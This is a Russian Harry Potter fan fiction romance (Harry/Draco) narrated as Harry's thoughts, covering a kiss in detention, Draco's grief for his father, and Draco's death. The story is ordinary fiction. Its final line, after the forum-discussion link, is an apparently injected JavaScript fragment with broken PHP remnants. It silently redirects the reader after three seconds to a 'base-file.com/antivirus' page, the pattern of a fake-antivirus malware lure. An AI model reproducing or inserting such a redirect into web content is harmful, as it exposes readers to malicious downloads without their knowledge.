О тебе…

Автор: Regis
Бета: Fiona
Pairing: Гарри/Драко
Рейтинг: PG - 13
Форма: треугольники
Жанр: romance
Дисклеймер: персонажи не мои.
Краткое содержание: мысли Гарри
Размещение: с разрешения автора

О тебе
Как всегда
Сердца стук…

 

Очередное взыскание. Опять Снейп. Вздыхаю. Котлы уже во сне мне являются и танцуют танго. Но сюрприз. Хо-хо, в этот раз и ты со мной, сокровище. Из-за меня, конечно. Выводить людей из себя - один из моих новых талантов, который я регулярно оттачиваю на тебе. А ведь когда-то ты этим славился. Да, всё меняется. То-то ты так зол. С тех пор, как Снейп вышел, поток оскорблений и ругательств не прекращается. Я не вслушиваюсь в слова. Лишь звук твоего голоса служит приятным фоном для моих мыслей.

Спустя время, понимаю, что даже удовольствие в большом объёме раздражает. Хочу заткнуть тебя и, притянув к себе, яростно целую. От неожиданности ты отвечаешь мне, не менее страстно. Все мысли машут мне лапками и вылетают вон.

О да… Отрываюсь от тебя, только когда заканчивается воздух. Ты раскраснелся, удивлённо смотришь на меня и молчишь. А ведь хорошее средство, - лениво думаю я, - помогло. И вдруг, как вспышка: Мерлин, это не сон. Я и вправду поцеловал тебя. Я решился?! Так долго думал об этом и так спонтанно всё вышло... В смущеньи я опускаю голову. Не могу смотреть на тебя. Боюсь. Боюсь насмешки и презренья в твоих холодных глазах.

- Не знал, что нравлюсь тебе, Гарри, - слышу я твой голос, такой мягкий, такой мурлыкающий. Ты так произносишь мое имя, что я таю и растекаюсь по полу.

- Драко, - шепчу я в ответ, обнимая тебя и зарываясь лицом в твои волосы. Блаженство в чистом виде, абсолютное и неразбавленное, затопляет меня.

Соскучился. Хожу, ищу тебя везде. Странно. Куда ты делся? Всё, осталась только крыша. Точно. Нахожу тебя там. Лежишь и смотришь в ночное небо. Лишь подойдя ближе, замечаю: ты плачешь, беззвучно и безутешно. Я замираю. Впервые вижу твои слезы. Нежность переполняет меня, и я решаюсь:

- Что случилось, Драко?

Как банально, как пошло облачка моих мыслей обращаются в булыжники слов. Ты вздрагиваешь. Хрипло бросаешь:

- Уйди, Гарри, пожалуйста.

Я не слушаюсь. Сажусь рядом и кладу твою голову себе на колени. Ты вздыхаешь.

- Что случилось? - повторяю я, как попугай.

- Ничего особенного, - бесцветным, тусклым голосом отвечаешь ты, - моего отца убил Вольдеморт. - И тихо продолжаешь: - Просто умер ещё один твой враг.

- Как ты можешь говорить так, Драко? - возмущаюсь я, - Ты дорог мне, и я не хотел смерти твоему отцу.

Через минуту виноватое:

- Извини, Гарри. Я сейчас не в себе.

Ты приподнимаешься и обнимаешь меня. А мерзкий голосок нашёптывает в ухо: "Люциус умер? Прекрасно. У Драко остался только ты. Вольдеморт - убийца? Великолепно. Теперь Драко не станет Упиввающимся Смертью. Он будет на правильной стороне. На твоей стороне. Теперь он твой. Он твой. Твой, твой, твой…"

Ты тихо плачешь у меня на плече, а меня одолевают подленькие мыслишки. Я старательно гоню их, надеясь, что, когда ты взглянешь мне в глаза, то увидишь состраданье и любовь, а не триумф, который буквально сочится из меня.

…зеленый луч Авады пронзает тебя, такого нежного и хрупкого. Ты падаешь, падаешь, и падаешь, медленно и безмолвно, как в маггловском кино. Невыносимо прекрасную картину смерти разбивает в мелкие осколки мой дикий крик:

- Дра-а-а-ко!

Я взлетаю, и через мгновенье ты у моих ног.

- Драко, - шепчу я нежно, наклоняясь к тебе. Волосы упали тебе на лицо, и я отвожу прядь рукой. Хмурое осеннее небо в серебристо-серых глазах. Как ты красив сейчас. Но пелена слез прячет тебя от меня.

- Драко…

Тоска ржавыми, тупыми ножами кромсает моё сердце. Как больно…

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>